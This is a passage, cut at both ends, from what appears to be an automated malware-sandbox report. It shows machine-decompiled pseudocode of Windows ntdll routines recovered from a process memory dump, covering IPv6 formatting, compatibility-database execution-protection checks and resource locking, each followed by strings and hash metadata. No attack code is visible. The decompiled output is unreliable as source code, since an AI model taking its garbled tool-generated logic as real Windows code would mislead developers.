                                                                                                                          				_t102 = _t60;
                                                                                                                          				do {
                                                                                                                          					if( *((intOrPtr*)(_t120 + _t115 * 2)) == _t121) {
                                                                                                                          						__eflags = _t115 - _t60 + 1 - _v8 - _t102;
                                                                                                                          						_t60 = _v20;
                                                                                                                          						if(__eflags <= 0) {
                                                                                                                          							_t105 = _v8;
                                                                                                                          						} else {
                                                                                                                          							_t49 = _t115 + 1; // 0x1
                                                                                                                          							_t105 = _t49;
                                                                                                                          							_t102 = _t60;
                                                                                                                          							_v8 = _t105;
                                                                                                                          						}
                                                                                                                          					} else {
                                                                                                                          						_t13 = _t115 + 1; // 0x1
                                                                                                                          						_t60 = _t13;
                                                                                                                          						_v20 = _t60;
                                                                                                                          					}
                                                                                                                          					_t115 = _t115 + 1;
                                                                                                                          				} while (_t115 < _v24);
                                                                                                                          				_v12 = _t102;
                                                                                                                          				_t103 = _a8;
                                                                                                                          				if(_t105 - _t102 > 1) {
                                                                                                                          					_t65 = _v12;
                                                                                                                          				} else {
                                                                                                                          					_t105 = _t121;
                                                                                                                          					_t65 = _t121;
                                                                                                                          					_v8 = _t105;
                                                                                                                          					_v12 = _t65;
                                                                                                                          				}
                                                                                                                          				do {
                                                                                                                          					if(_t121 < _t105) {
                                                                                                                          						__eflags = _t65 - _t121;
                                                                                                                          						if(_t65 > _t121) {
                                                                                                                          							goto L9;
                                                                                                                          						}
                                                                                                                          						_push("::");
                                                                                                                          						_push(_v16 - _t103);
                                                                                                                          						_push(_t103);
                                                                                                                          						_t70 = E036D6B30();
                                                                                                                          						_t105 = _v8;
                                                                                                                          						_t122 = _t122 + 0xc;
                                                                                                                          						_t121 = _t105 - 1;
                                                                                                                          						goto L13;
                                                                                                                          					}
                                                                                                                          					L9:
                                                                                                                          					if(_t121 != 0 && _t121 != _t105) {
                                                                                                                          						_push(":");
                                                                                                                          						_push(_v16 - _t103);
                                                                                                                          						_push(_t103);
                                                                                                                          						_t73 = E036D6B30();
                                                                                                                          						_t122 = _t122 + 0xc;
                                                                                                                          						_t103 = _t103 + _t73;
                                                                                                                          					}
                                                                                                                          					_t70 = E036D6B30(_t103, _v16 - _t103, "%x",  *(_t120 + _t121 * 2) & 0x0000ffff);
                                                                                                                          					_t105 = _v8;
                                                                                                                          					_t122 = _t122 + 0x10;
                                                                                                                          					L13:
                                                                                                                          					_t116 = _v24;
                                                                                                                          					_t103 = _t103 + _t70;
                                                                                                                          					_t65 = _v12;
                                                                                                                          					_t121 = _t121 + 1;
                                                                                                                          				} while (_t121 < _t116);
                                                                                                                          				if(_t116 < 8) {
                                                                                                                          					_push( *(_t120 + 0xf) & 0x000000ff);
                                                                                                                          					_push( *(_t120 + 0xe) & 0x000000ff);
                                                                                                                          					_push( *(_t120 + 0xd) & 0x000000ff);
                                                                                                                          					_t103 = _t103 + E036D6B30(_t103, _v16 - _t103, ":%u.%u.%u.%u",  *(_t120 + 0xc) & 0x000000ff);
                                                                                                                          				}
                                                                                                                          				return _t103;
                                                                                                                          			}




























                                                                                                                          APIs
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000017.00000002.564054708.0000000003660000.00000040.00000001.sdmp, Offset: 03660000, based on PE: true
                                                                                                                          • Associated: 00000017.00000002.566006399.000000000377B000.00000040.00000001.sdmp
                                                                                                                          • Associated: 00000017.00000002.566051277.000000000377F000.00000040.00000001.sdmp
                                                                                                                          Similarity
                                                                                                                          • API ID: ___swprintf_l
                                                                                                                          • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                                                          • API String ID: 48624451-2108815105
                                                                                                                          • Opcode ID: 652ef9789af4e8f0938b5f8ab0f125375a6fd1592526edd8749ee0428679389a
                                                                                                                          • Instruction ID: 66e904f862941daf62612d5d8cf70a92a0b97bf6166a6da23e080136a1c6e422
                                                                                                                          • Opcode Fuzzy Hash: 652ef9789af4e8f0938b5f8ab0f125375a6fd1592526edd8749ee0428679389a
                                                                                                                          • Instruction Fuzzy Hash: 076124B5B00126AFCB10EFA8C99097EF7B8FF09604B64866AE854D7341D731DE54C7A0
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          C-Code - Quality: 63%
                                                                                                                          			E036840FD(void* __ecx) {
                                                                                                                          				signed int _v8;
                                                                                                                          				char _v548;
                                                                                                                          				unsigned int _v552;
                                                                                                                          				unsigned int _v556;
                                                                                                                          				unsigned int _v560;
                                                                                                                          				char _v564;
                                                                                                                          				char _v568;
                                                                                                                          				void* __ebx;
                                                                                                                          				void* __edi;
                                                                                                                          				void* __esi;
                                                                                                                          				unsigned int _t49;
                                                                                                                          				signed char _t53;
                                                                                                                          				unsigned int _t55;
                                                                                                                          				unsigned int _t56;
                                                                                                                          				unsigned int _t65;
                                                                                                                          				unsigned int _t66;
                                                                                                                          				void* _t68;
                                                                                                                          				unsigned int _t73;
                                                                                                                          				unsigned int _t77;
                                                                                                                          				unsigned int _t85;
                                                                                                                          				char* _t98;
                                                                                                                          				unsigned int _t102;
                                                                                                                          				signed int _t103;
                                                                                                                          				void* _t105;
                                                                                                                          				signed int _t107;
                                                                                                                          				void* _t108;
                                                                                                                          				void* _t110;
                                                                                                                          				void* _t111;
                                                                                                                          				void* _t112;
                                                                                                                          
                                                                                                                          				_t45 =  *0x377d360 ^ _t107;
                                                                                                                          				_v8 =  *0x377d360 ^ _t107;
                                                                                                                          				_t105 = __ecx;
                                                                                                                          				if( *0x37784d4 == 0) {
                                                                                                                          					L5:
                                                                                                                          					return E036CB640(_t45, _t85, _v8 ^ _t107, _t102, _t105, _t106);
                                                                                                                          				}
                                                                                                                          				_t85 = 0;
                                                                                                                          				E0369E9C0(3,  *((intOrPtr*)(__ecx + 0x18)), 0, 0,  &_v564);
                                                                                                                          				if(( *0x7ffe02d5 & 0x00000003) == 0) {
                                                                                                                          					_t45 = 0;
                                                                                                                          				} else {
                                                                                                                          					_t45 =  *(_v564 + 0x5f) & 0x00000001;
                                                                                                                          				}
                                                                                                                          				if(_t45 == 0) {
                                                                                                                          					_v552 = _t85;
                                                                                                                          					_t49 = E036842EB(_t105);
                                                                                                                          					__eflags = _t49;
                                                                                                                          					if(_t49 != 0) {
                                                                                                                          						L15:
                                                                                                                          						_t103 = 2;
                                                                                                                          						_v552 = _t103;
                                                                                                                          						L10:
                                                                                                                          						__eflags = ( *0x7ffe02d5 & 0x0000000c) - 4;
                                                                                                                          						if(( *0x7ffe02d5 & 0x0000000c) == 4) {
                                                                                                                          							_t45 = 1;
                                                                                                                          						} else {
                                                                                                                          							_t53 = E036841EA(_v564);
                                                                                                                          							asm("sbb al, al");
                                                                                                                          							_t45 =  ~_t53 + 1;
                                                                                                                          							__eflags = _t45;
                                                                                                                          						}
                                                                                                                          						__eflags = _t45;
                                                                                                                          						if(_t45 == 0) {
                                                                                                                          							_t102 = _t103 | 0x00000040;
                                                                                                                          							_v552 = _t102;
                                                                                                                          						}
                                                                                                                          						__eflags = _t102;
                                                                                                                          						if(_t102 != 0) {
                                                                                                                          							L33:
                                                                                                                          							_push(4);
                                                                                                                          							_push( &_v552);
                                                                                                                          							_push(0x22);
                                                                                                                          							_push(0xffffffff);
                                                                                                                          							_t45 = E036C96C0();
                                                                                                                          						}
                                                                                                                          						goto L4;
                                                                                                                          					}
                                                                                                                          					_v556 = _t85;
                                                                                                                          					_t102 =  &_v556;
                                                                                                                          					_t55 = E0368429E(_t105 + 0x2c, _t102);
                                                                                                                          					__eflags = _t55;
                                                                                                                          					if(_t55 >= 0) {
                                                                                                                          						__eflags = _v556 - _t85;
                                                                                                                          						if(_v556 == _t85) {
                                                                                                                          							goto L8;
                                                                                                                          						}
                                                                                                                          						_t85 = _t105 + 0x24;
                                                                                                                          						E03715720(0x55, 3, "CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions\n", _v556);
                                                                                                                          						_v560 = 0x214;
                                                                                                                          						E036CFA60( &_v548, 0, 0x214);
                                                                                                                          						_t106 =  *0x37784d4;
                                                                                                                          						_t110 = _t108 + 0x20;
                                                                                                                          						 *0x377b1e0( *((intOrPtr*)(_t105 + 0x28)),  *((intOrPtr*)(_t105 + 0x18)),  *((intOrPtr*)(_t105 + 0x20)), L"ExecuteOptions",  &_v568,  &_v548,  &_v560, _t85);
                                                                                                                          						_t65 =  *((intOrPtr*)( *0x37784d4))();
                                                                                                                          						__eflags = _t65;
                                                                                                                          						if(_t65 == 0) {
                                                                                                                          							goto L8;
                                                                                                                          						}
                                                                                                                          						_t66 = _v560;
                                                                                                                          						__eflags = _t66;
                                                                                                                          						if(_t66 == 0) {
                                                                                                                          							goto L8;
                                                                                                                          						}
                                                                                                                          						__eflags = _t66 - 0x214;
                                                                                                                          						if(_t66 >= 0x214) {
                                                                                                                          							goto L8;
                                                                                                                          						}
                                                                                                                          						_t68 = (_t66 >> 1) * 2 - 2;
                                                                                                                          						__eflags = _t68 - 0x214;
                                                                                                                          						if(_t68 >= 0x214) {
                                                                                                                          							E036CB75A();
                                                                                                                          							goto L33;
                                                                                                                          						}
                                                                                                                          						_push(_t85);
                                                                                                                          						 *((short*)(_t107 + _t68 - 0x220)) = 0;
                                                                                                                          						E03715720(0x55, 3, "CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database\n",  &_v548);
                                                                                                                          						_t111 = _t110 + 0x14;
                                                                                                                          						_t73 = E036D1480( &_v548, L"Execute=1");
                                                                                                                          						_push(_t85);
                                                                                                                          						__eflags = _t73;
                                                                                                                          						if(_t73 == 0) {
                                                                                                                          							E03715720(0x55, 3, "CLIENT(ntdll): Processing %ws for patching section protection for %wZ\n",  &_v548);
                                                                                                                          							_t106 =  &_v548;
                                                                                                                          							_t98 =  &_v548;
                                                                                                                          							_t112 = _t111 + 0x14;
                                                                                                                          							_t77 = _v560 + _t98;
                                                                                                                          							_v556 = _t77;
                                                                                                                          							__eflags = _t98 - _t77;
                                                                                                                          							if(_t98 >= _t77) {
                                                                                                                          								goto L8;
                                                                                                                          							} else {
                                                                                                                          								goto L27;
                                                                                                                          							}
                                                                                                                          							do {
                                                                                                                          								L27:
                                                                                                                          								_t85 = E036D1150(_t106, 0x20);
                                                                                                                          								__eflags = _t85;
                                                                                                                          								if(__eflags != 0) {
                                                                                                                          									__eflags = 0;
                                                                                                                          									 *_t85 = 0;
                                                                                                                          								}
                                                                                                                          								E03715720(0x55, 3, "CLIENT(ntdll): Processing section info %ws...\n", _t106);
                                                                                                                          								_t112 = _t112 + 0x10;
                                                                                                                          								E03703E13(_t105, _t106, __eflags);
                                                                                                                          								__eflags = _t85;
                                                                                                                          								if(_t85 == 0) {
                                                                                                                          									goto L8;
                                                                                                                          								}
                                                                                                                          								_t41 = _t85 + 2; // 0x2
                                                                                                                          								_t106 = _t41;
                                                                                                                          								__eflags = _t106 - _v556;
                                                                                                                          							} while (_t106 < _v556);
                                                                                                                          							goto L8;
                                                                                                                          						}
                                                                                                                          						_push("CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ\n");
                                                                                                                          						_push(3);
                                                                                                                          						_push(0x55);
                                                                                                                          						E03715720();
                                                                                                                          						goto L15;
                                                                                                                          					}
                                                                                                                          					L8:
                                                                                                                          					_t56 = E036841F7(_t105);
                                                                                                                          					__eflags = _t56;
                                                                                                                          					if(_t56 != 0) {
                                                                                                                          						goto L15;
                                                                                                                          					}
                                                                                                                          					_t103 = _v552;
                                                                                                                          					goto L10;
                                                                                                                          				} else {
                                                                                                                          					L4:
                                                                                                                          					 *(_t105 + 0x34) =  *(_t105 + 0x34) | 0x80000000;
                                                                                                                          					goto L5;
                                                                                                                          				}
                                                                                                                          			}
































                                                                                                                          0x036841c9
                                                                                                                          0x036e0628
                                                                                                                          0x036e0628
                                                                                                                          0x036e0630
                                                                                                                          0x036e0631
                                                                                                                          0x036e0633
                                                                                                                          0x036e0635
                                                                                                                          0x036e0635
                                                                                                                          0x00000000
                                                                                                                          0x036841c9
                                                                                                                          0x0368417d
                                                                                                                          0x03684183
                                                                                                                          0x03684189
                                                                                                                          0x0368418e
                                                                                                                          0x03684190
                                                                                                                          0x036e04a9
                                                                                                                          0x036e04af
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x036e04b5
                                                                                                                          0x036e04c8
                                                                                                                          0x036e04d5
                                                                                                                          0x036e04e5
                                                                                                                          0x036e04ea
                                                                                                                          0x036e04f6
                                                                                                                          0x036e0518
                                                                                                                          0x036e051e
                                                                                                                          0x036e0520
                                                                                                                          0x036e0522
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x036e0528
                                                                                                                          0x036e052e
                                                                                                                          0x036e0530
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x036e053b
                                                                                                                          0x036e053d
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x036e0545
                                                                                                                          0x036e054c
                                                                                                                          0x036e054e
                                                                                                                          0x036e0623
                                                                                                                          0x00000000
                                                                                                                          0x036e0623
                                                                                                                          0x036e0556
                                                                                                                          0x036e0557
                                                                                                                          0x036e056f
                                                                                                                          0x036e0574
                                                                                                                          0x036e0583
                                                                                                                          0x036e058a
                                                                                                                          0x036e058b
                                                                                                                          0x036e058d
                                                                                                                          0x036e05b5
                                                                                                                          0x036e05c0
                                                                                                                          0x036e05c6
                                                                                                                          0x036e05c8
                                                                                                                          0x036e05cb
                                                                                                                          0x036e05cd
                                                                                                                          0x036e05d3
                                                                                                                          0x036e05d5
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x036e05db
                                                                                                                          0x036e05db
                                                                                                                          0x036e05e3
                                                                                                                          0x036e05e7
                                                                                                                          0x036e05e9
                                                                                                                          0x036e05eb
                                                                                                                          0x036e05ed
                                                                                                                          0x036e05ed
                                                                                                                          0x036e05fa
                                                                                                                          0x036e05ff
                                                                                                                          0x036e0606
                                                                                                                          0x036e060b
                                                                                                                          0x036e060d
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x036e0613
                                                                                                                          0x036e0613
                                                                                                                          0x036e0616
                                                                                                                          0x036e0616
                                                                                                                          0x00000000
                                                                                                                          0x036e061e
                                                                                                                          0x036e058f
                                                                                                                          0x036e0594
                                                                                                                          0x036e0596
                                                                                                                          0x036e0598
                                                                                                                          0x00000000
                                                                                                                          0x036e059d
                                                                                                                          0x03684196
                                                                                                                          0x03684198
                                                                                                                          0x0368419d
                                                                                                                          0x0368419f
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x036841a1
                                                                                                                          0x00000000
                                                                                                                          0x03684151
                                                                                                                          0x03684151
                                                                                                                          0x03684151
                                                                                                                          0x00000000
                                                                                                                          0x03684151

                                                                                                                          Strings
                                                                                                                          • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 036E05AC
                                                                                                                          • CLIENT(ntdll): Processing section info %ws..., xrefs: 036E05F1
                                                                                                                          • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 036E0566
                                                                                                                          • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 036E058F
                                                                                                                          • ExecuteOptions, xrefs: 036E050A
                                                                                                                          • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 036E04BF
                                                                                                                          • Execute=1, xrefs: 036E057D
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000017.00000002.564054708.0000000003660000.00000040.00000001.sdmp, Offset: 03660000, based on PE: true
                                                                                                                          • Associated: 00000017.00000002.566006399.000000000377B000.00000040.00000001.sdmp
                                                                                                                          • Associated: 00000017.00000002.566051277.000000000377F000.00000040.00000001.sdmp
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                                                                                          • API String ID: 0-484625025
                                                                                                                          • Opcode ID: 4462939f89a3e3a2f1177dfa4708d55a9210bc2ed9b5ecb600b0ef16f8c11d39
                                                                                                                          • Instruction ID: b54cd574509b30b885a37ef015d231c8dc0d85f74a92e0d32671641e94468f8f
                                                                                                                          • Opcode Fuzzy Hash: 4462939f89a3e3a2f1177dfa4708d55a9210bc2ed9b5ecb600b0ef16f8c11d39
                                                                                                                          • Instruction Fuzzy Hash: EE616C35A0030ABADF11FB97DD85FBA7BBCEF18300F040199D5459B280DF709A558B64
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          C-Code - Quality: 60%
                                                                                                                          			E036877A0(void* __ecx, void* __edx, intOrPtr _a4, char _a8) {
                                                                                                                          				void* __ebx;
                                                                                                                          				void* __edi;
                                                                                                                          				void* __esi;
                                                                                                                          				void* __ebp;
                                                                                                                          				char _t16;
                                                                                                                          				char _t17;
                                                                                                                          				char _t21;
                                                                                                                          				void* _t23;
                                                                                                                          				char _t28;
                                                                                                                          				intOrPtr* _t30;
                                                                                                                          				char _t32;
                                                                                                                          				intOrPtr _t34;
                                                                                                                          				void* _t37;
                                                                                                                          				intOrPtr _t39;
                                                                                                                          				char _t42;
                                                                                                                          				signed int _t49;
                                                                                                                          				signed int _t50;
                                                                                                                          				void* _t51;
                                                                                                                          
                                                                                                                          				_t37 = __edx;
                                                                                                                          				_t50 = _t49 & 0xfffffff8;
                                                                                                                          				_push(__ecx);
                                                                                                                          				_t39 = _a4;
                                                                                                                          				_t30 = _t39 + 0x28;
                                                                                                                          				_t42 =  *_t30;
                                                                                                                          				if(_t42 < 0) {
                                                                                                                          					_t34 =  *[fs:0x18];
                                                                                                                          					__eflags =  *((intOrPtr*)(_t39 + 0x2c)) -  *((intOrPtr*)(_t34 + 0x24));
                                                                                                                          					if( *((intOrPtr*)(_t39 + 0x2c)) !=  *((intOrPtr*)(_t34 + 0x24))) {
                                                                                                                          						while(1) {
                                                                                                                          							L7:
                                                                                                                          							__eflags = _t42;
                                                                                                                          							if(_t42 >= 0) {
                                                                                                                          								goto L1;
                                                                                                                          							}
                                                                                                                          							__eflags = _a8;
                                                                                                                          							if(_a8 == 0) {
                                                                                                                          								L19:
                                                                                                                          								_t17 = 0;
                                                                                                                          								L3:
                                                                                                                          								return _t17;
                                                                                                                          							}
                                                                                                                          							_t18 =  *((intOrPtr*)(_t39 + 0x34));
                                                                                                                          							_t36 = _t39 + 0x1c;
                                                                                                                          							 *((intOrPtr*)(_t18 + 0x14)) =  *((intOrPtr*)( *((intOrPtr*)(_t39 + 0x34)) + 0x14)) + 1;
                                                                                                                          							asm("lock inc dword [ecx]");
                                                                                                                          							_t42 =  *_t30;
                                                                                                                          							__eflags = _t42;
                                                                                                                          							if(_t42 < 0) {
                                                                                                                          								L11:
                                                                                                                          								_t32 = 0;
                                                                                                                          								__eflags = 0;
                                                                                                                          								while(1) {
                                                                                                                          									asm("sbb esi, esi");
                                                                                                                          									_t47 =  !( ~( *(_t39 + 0x30) & 1)) & 0x037779c8;
                                                                                                                          									_push( !( ~( *(_t39 + 0x30) & 1)) & 0x037779c8);
                                                                                                                          									_push(0);
                                                                                                                          									_push( *((intOrPtr*)(_t39 + 0x18)));
                                                                                                                          									_t21 = E036C9520();
                                                                                                                          									__eflags = _t21 - 0x102;
                                                                                                                          									if(_t21 != 0x102) {
                                                                                                                          										break;
                                                                                                                          									}
                                                                                                                          									_t23 = E036CCE00( *_t47,  *((intOrPtr*)(_t47 + 4)), 0xff676980, 0xffffffff);
                                                                                                                          									_push(_t37);
                                                                                                                          									_push(_t23);
                                                                                                                          									E03715720(0x65, 0, "RTL: Acquire Shared Sem Timeout %d(%I64u secs)\n", _t32);
                                                                                                                          									E03715720(0x65, 0, "RTL: Resource at %p\n", _t39);
                                                                                                                          									_t51 = _t50 + 0x28;
                                                                                                                          									_t32 = _t32 + 1;
                                                                                                                          									__eflags = _t32 - 2;
                                                                                                                          									if(__eflags > 0) {
                                                                                                                          										_t36 = _t39;
                                                                                                                          										E0371FFB9(_t32, _t39, _t37, _t39, 0, __eflags);
                                                                                                                          									}
                                                                                                                          									_push("RTL: Re-Waiting\n");
                                                                                                                          									_push(0);
                                                                                                                          									_push(0x65);
                                                                                                                          									E03715720();
                                                                                                                          									_t50 = _t51 + 0xc;
                                                                                                                          								}
                                                                                                                          								_t30 = _t39 + 0x28;
                                                                                                                          								__eflags = _t21;
                                                                                                                          								if(_t21 < 0) {
                                                                                                                          									L036DDF30(_t36, _t37, _t21);
                                                                                                                          									goto L19;
                                                                                                                          								}
                                                                                                                          								_t42 =  *_t30;
                                                                                                                          								continue;
                                                                                                                          							}
                                                                                                                          							_t28 = E036C47E7(_t36);
                                                                                                                          							__eflags = _t28;
                                                                                                                          							if(_t28 != 0) {
                                                                                                                          								continue;
                                                                                                                          							}
                                                                                                                          							goto L11;
                                                                                                                          						}
                                                                                                                          						goto L1;
                                                                                                                          					}
                                                                                                                          					asm("lock dec dword [ebx]");
                                                                                                                          					L2:
                                                                                                                          					_t17 = 1;
                                                                                                                          					goto L3;
                                                                                                                          				}
                                                                                                                          				L1:
                                                                                                                          				_t16 = _t42;
                                                                                                                          				asm("lock cmpxchg [ebx], ecx");
                                                                                                                          				if(_t16 != _t42) {
                                                                                                                          					_t42 = _t16;
                                                                                                                          					goto L7;
                                                                                                                          				}
                                                                                                                          				goto L2;
                                                                                                                          			}






















                                                                                                                          APIs
                                                                                                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 036E2953
                                                                                                                          Strings
                                                                                                                          • RTL: Resource at %p, xrefs: 036E296B
                                                                                                                          • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 036E295B
                                                                                                                          • RTL: Re-Waiting, xrefs: 036E2988
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000017.00000002.564054708.0000000003660000.00000040.00000001.sdmp, Offset: 03660000, based on PE: true
                                                                                                                          • Associated: 00000017.00000002.566006399.000000000377B000.00000040.00000001.sdmp
                                                                                                                          • Associated: 00000017.00000002.566051277.000000000377F000.00000040.00000001.sdmp
                                                                                                                          Similarity
                                                                                                                          • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                                          • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                                                          • API String ID: 885266447-605551621
                                                                                                                          • Opcode ID: e97deaf35efd7c79223b4d2ba8c41cfac9d6f7542a12fd47356305fa7c2fd1a2
                                                                                                                          • Instruction ID: f397e0d0f8532f5dce5146770ecae1b4c2ab4f285c122fafa4303c9930aaee16
                                                                                                                          • Opcode Fuzzy Hash: e97deaf35efd7c79223b4d2ba8c41cfac9d6f7542a12fd47356305fa7c2fd1a2
                                                                                                                          • Instruction Fuzzy Hash: ED315B36A01725BBDB21EA16CC85F6B7B6EEF46B20F240658EC545B241CB21B819C7E1
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          C-Code - Quality: 69%
                                                                                                                          			E036C1CC7(void* __ebx, intOrPtr* __ecx, signed int __edx, void* __edi, void* __esi, void* __eflags) {
                                                                                                                          				intOrPtr _t91;
                                                                                                                          				intOrPtr _t95;
                                                                                                                          				short _t96;
                                                                                                                          				intOrPtr _t104;
                                                                                                                          				intOrPtr _t111;
                                                                                                                          				short _t119;
                                                                                                                          				signed int _t131;
                                                                                                                          				intOrPtr _t134;
                                                                                                                          				intOrPtr _t138;
                                                                                                                          				intOrPtr* _t144;
                                                                                                                          				intOrPtr* _t147;
                                                                                                                          				intOrPtr* _t149;
                                                                                                                          				void* _t151;
                                                                                                                          
                                                                                                                          				_t139 = __edx;
                                                                                                                          				_push(0x154);
                                                                                                                          				_push(0x3760348);
                                                                                                                          				E036DD0E8(__ebx, __edi, __esi);
                                                                                                                          				 *(_t151 - 0xf0) = __edx;
                                                                                                                          				_t147 = __ecx;
                                                                                                                          				 *((intOrPtr*)(_t151 - 0xfc)) = __ecx;
                                                                                                                          				 *((intOrPtr*)(_t151 - 0xf8)) =  *((intOrPtr*)(_t151 + 8));
                                                                                                                          				 *((intOrPtr*)(_t151 - 0xe8)) =  *((intOrPtr*)(_t151 + 0xc));
                                                                                                                          				 *((intOrPtr*)(_t151 - 0xf4)) =  *((intOrPtr*)(_t151 + 0x10));
                                                                                                                          				 *((intOrPtr*)(_t151 - 0xe4)) = 0;
                                                                                                                          				 *((intOrPtr*)(_t151 - 0xdc)) = 0;
                                                                                                                          				 *((intOrPtr*)(_t151 - 0xd8)) = 0;
                                                                                                                          				 *(_t151 - 0xe0) = 0;
                                                                                                                          				 *((intOrPtr*)(_t151 - 0x140)) = 0x40;
                                                                                                                          				E036CFA60(_t151 - 0x13c, 0, 0x3c);
                                                                                                                          				 *((intOrPtr*)(_t151 - 0x164)) = 0x24;
                                                                                                                          				 *((intOrPtr*)(_t151 - 0x160)) = 1;
                                                                                                                          				_t131 = 7;
                                                                                                                          				memset(_t151 - 0x15c, 0, _t131 << 2);
                                                                                                                          				_t144 =  *((intOrPtr*)(_t151 - 0xe8));
                                                                                                                          				_t91 = E036A2430(1, _t147, 0,  *((intOrPtr*)(_t151 - 0xf8)), _t144,  *((intOrPtr*)(_t151 - 0xf4)), _t151 - 0xe0, 0, 0);
                                                                                                                          				_t148 = _t91;
                                                                                                                          				if(_t91 >= 0) {
                                                                                                                          					if( *0x3778460 != 0 && ( *(_t151 - 0xe0) & 0x00000001) == 0) {
                                                                                                                          						_t95 = E036A2D50(7, 0, 2,  *((intOrPtr*)(_t151 - 0xfc)), _t151 - 0x140);
                                                                                                                          						_t148 = _t95;
                                                                                                                          						if(_t95 < 0) {
                                                                                                                          							goto L1;
                                                                                                                          						}
                                                                                                                          						if( *((intOrPtr*)(_t151 - 0x13c)) == 1) {
                                                                                                                          							if(( *(_t151 - 0x118) & 0x00000001) == 0) {
                                                                                                                          								if(( *(_t151 - 0x118) & 0x00000002) != 0) {
                                                                                                                          									 *(_t151 - 0x120) = 0xfffffffc;
                                                                                                                          								}
                                                                                                                          							} else {
                                                                                                                          								 *(_t151 - 0x120) =  *(_t151 - 0x120) & 0x00000000;
                                                                                                                          							}
                                                                                                                          							_t134 =  *((intOrPtr*)(_t151 - 0x114));
                                                                                                                          							_t96 =  *((intOrPtr*)(_t134 + 0x5c));
                                                                                                                          							 *((short*)(_t151 - 0xda)) = _t96;
                                                                                                                          							 *((short*)(_t151 - 0xdc)) = _t96;
                                                                                                                          							 *((intOrPtr*)(_t151 - 0xd8)) =  *((intOrPtr*)(_t134 + 0x60)) +  *((intOrPtr*)(_t151 - 0x110));
                                                                                                                          							 *((intOrPtr*)(_t151 - 0xe8)) = _t151 - 0xd0;
                                                                                                                          							 *((short*)(_t151 - 0xea)) = 0xaa;
                                                                                                                          							_t104 = E03694720(_t139,  *(_t151 - 0xf0) & 0x0000ffff, _t151 - 0xec, 2, 0);
                                                                                                                          							_t148 = _t104;
                                                                                                                          							if(_t104 < 0 || E03699660(_t151 - 0xdc, _t151 - 0xec, 1) == 0) {
                                                                                                                          								goto L1;
                                                                                                                          							} else {
                                                                                                                          								_t149 =  *0x3778460; // 0x7478ff90
                                                                                                                          								 *0x377b1e0( *(_t151 - 0x120),  *(_t151 - 0xf0), _t151 - 0xe4);
                                                                                                                          								_t148 =  *_t149();
                                                                                                                          								 *((intOrPtr*)(_t151 - 0xd4)) = _t148;
                                                                                                                          								if(_t148 < 0) {
                                                                                                                          									goto L1;
                                                                                                                          								}
                                                                                                                          								_t111 =  *((intOrPtr*)(_t151 - 0xe4));
                                                                                                                          								if(_t111 == 0xffffffff) {
                                                                                                                          									L25:
                                                                                                                          									 *((intOrPtr*)(_t151 - 4)) = 1;
                                                                                                                          									_t144 =  *0x3778468;
                                                                                                                          									if(_t144 != 0) {
                                                                                                                          										 *0x377b1e0(_t111);
                                                                                                                          										 *_t144();
                                                                                                                          									}
                                                                                                                          									 *((intOrPtr*)(_t151 - 4)) = 0xfffffffe;
                                                                                                                          									goto L1;
                                                                                                                          								}
                                                                                                                          								E0369F540(_t151 - 0x164, _t111);
                                                                                                                          								 *((intOrPtr*)(_t151 - 4)) = 0;
                                                                                                                          								if( *((intOrPtr*)(_t144 + 4)) != 0) {
                                                                                                                          									L036A2400(_t144);
                                                                                                                          								}
                                                                                                                          								_t145 =  *((intOrPtr*)(_t151 - 0xfc));
                                                                                                                          								_t148 = E036A2430(0,  *((intOrPtr*)(_t151 - 0xfc)), 0,  *((intOrPtr*)(_t151 - 0xf8)), _t144,  *((intOrPtr*)(_t151 - 0xf4)), _t151 - 0xe0, 0, 0);
                                                                                                                          								 *((intOrPtr*)(_t151 - 0xd4)) = _t148;
                                                                                                                          								if(_t148 < 0) {
                                                                                                                          									L24:
                                                                                                                          									 *((intOrPtr*)(_t151 - 4)) = 0xfffffffe;
                                                                                                                          									_t111 = E036FD704();
                                                                                                                          									goto L25;
                                                                                                                          								} else {
                                                                                                                          									_t148 = E036A2D50(7, 0, 2, _t145, _t151 - 0x140);
                                                                                                                          									 *((intOrPtr*)(_t151 - 0xd4)) = _t148;
                                                                                                                          									if(_t148 < 0) {
                                                                                                                          										goto L24;
                                                                                                                          									}
                                                                                                                          									if( *((intOrPtr*)(_t151 - 0x13c)) == 1) {
